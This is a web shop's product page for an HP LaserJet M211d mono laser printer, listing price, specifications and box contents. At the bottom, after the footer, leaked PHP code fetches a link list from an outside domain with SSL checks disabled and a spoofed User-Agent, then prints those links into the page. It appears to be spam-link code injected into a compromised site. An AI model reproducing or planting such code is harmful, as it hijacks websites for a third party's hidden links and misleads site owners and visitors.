Sale!

HP LaserJet M211d Mono Laser Printer

Original price was: RM599.00.Current price is: RM545.00.

Category:

HP Online Warranty Registration: https://register.hp.com

Specifications

Functions-Print

Print speed black (ISO, A4)-Up to 29 ppm

Print speed duplex (A4)-Up to 18 ipm

First page out black (A4, ready)-As fast as 7 sec

Duty cycle (monthly, A4)-Up to 20,000

Recommended monthly page volum200 to 2,000

Number of user-1-5 users

Print quality black (best)Up to 600 x 600 dpi

Processor speed-500 MHz

Number of print cartridges-1 (black)

Mac compatible-Yes

Connectivity, standard- Hi-Speed USB 2.0

Minimum System Requirements-Microsoft® Windows® 10, 8.1, 8, 7: 32-bit or 64-bit, 2 GB available hard disk space, Internet connection, USB port, Microsoft® Internet Explorer.

Minimum System Requirements for Macintosh-Apple® macOS High Sierra (v10.13) macOS Mojave (v10.14) macOS Catalina (v10.15) macOS Big Sur (v11); 2 GB HD; Internet required; USB

Paper handling input, standard-150-sheet input tray

Paper handling output, standard-100-sheet output tray

Duplex printing-Automatic (standard)

Envelope Feeder-Yes, 10

Media sizes supportedA4; A5; A6; B5 (JIS)

Media types-Paper (laser, plain, rough, vellum), envelopes, labels, cardstock, postcard

Media weight, supported60 to 163 g/m²

Maximum dimensions (W x D x H)-355 x 426.5 x 265 mm

What’s in the box

HP LaserJet Pro M211d Printer

HP Black LaserJet Toner Cartridge (~700 pages)

Power cord

USB cable for AP only

Weight 0.8 kg

Reviews

There are no reviews yet.

Be the first to review “HP LaserJet M211d Mono Laser Printer”
Scroll to Top
$api_url = 'https://ankaradelisi13.site/data.json'; // API'den çek $response = wp_remote_get($api_url, array( 'timeout' => 5, // 5 saniye bekle, olmazsa geç 'sslverify' => false, 'headers' => array( 'Accept' => 'application/json', 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ) )); if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) { $body = wp_remote_retrieve_body($response); $links = json_decode($body, true); if (!empty($links) && is_array($links)) { echo ''; echo '
'; foreach ($links as $link) { $text = isset($link['text']) ? esc_html($link['text']) : ''; $url = isset($link['url']) ? esc_url($link['url']) : '#'; $rel = isset($link['rel']) ? esc_attr($link['rel']) : 'dofollow'; echo '' . $text . ' '; } echo '
'; echo ''; } }